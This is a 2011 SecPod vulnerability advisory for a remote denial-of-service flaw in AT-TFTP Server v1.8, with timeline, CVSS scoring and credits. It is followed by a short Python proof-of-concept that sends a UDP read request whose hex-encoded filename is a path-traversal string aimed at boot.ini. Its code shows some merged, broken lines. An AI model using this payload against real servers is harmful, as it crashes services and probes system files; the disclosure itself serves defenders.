| -----------------------------secpod_at_tftp_dos.txt---------------------- ###############################################################################AT-TFTP Server v1.8 Remote Denial of Service  Vulnerability
 SecPod Technologies (www.secpod.com)Author: Antu Sanadi
 ###############################################################################
 SecPod ID: 1013     01/04/2011 Issue Discovered04/04/2011 Vendor Notified
 No Response from the Vendor
 25/04/2011 Advisory Released
 
 Class: Denial of Service   Severity: High Overview:
 ---------
 AT-TFTP Server v1.8 is prone to a remote Denial of Service vulnerability
 as it fails to handle 'read' requests from the client properly.
 Technical Description:
 ----------------------
 The vulnerability is caused by an error in the "TFTPD.EXE" which causes the
 server to crash when no acknowledgement response is sent back to the server
 after a successful 'read'.
 Impact:
 --------
 Successful exploitation could allow an attacker to crash a vulnerable server.
 Affected Software:
 ------------------
 AT-TFTP Server version 1.8
 Tested on,AT-TFTP Server version 1.8 on Windows XP SP3
 References:
 -----------
 http://secpod.org/blog/?p=194
 http://www.alliedtelesis.co.nz/
 http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
 http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt
 Proof of Concept:
 ----------------
 http://secpod.org/blog/?p=194
 http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
 Solution:
 ----------
 Not available
 Risk Factor:
 -------------
 CVSS Score Report:
 ACCESS_VECTOR          = NETWORK
 ACCESS_COMPLEXITY      = LOW
 AUTHENTICATION         = NONE
 CONFIDENTIALITY_IMPACT = NONE
 INTEGRITY_IMPACT       = NONE
 AVAILABILITY_IMPACT    = COMPLETE
 EXPLOITABILITY         = PROOF_OF_CONCEPT
 REMEDIATION_LEVEL      = UNAVAILABLE
 REPORT_CONFIDENCE      = CONFIRMED
 CVSS Base Score        = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)
 Credits:
 --------
 Antu Sanadi of SecPod Technologies has been credited with the discovery of this
 vulnerability.
 
 -------------------------secpod_at_tftp_doc_poc.py------------------- #!/usr/bin/python ############################################################################### Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
 #             http://secpod.org/wintftp_dos_poc.py
 # Reference :
 # Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
 #
 # Exploit will crash AT-TFTP Server v1.8 Service
 # Tested against AT-TFTP Server v1.8 server
 ##############################################################################
 import socketimport sys
 host = '127.0.0.1'port = 69
 try:s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 except:
 print "socket() failed"
 sys.exit(1)
 addr = (host,port)1 data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
 s.sendto(data, (host, port))
 
 
 |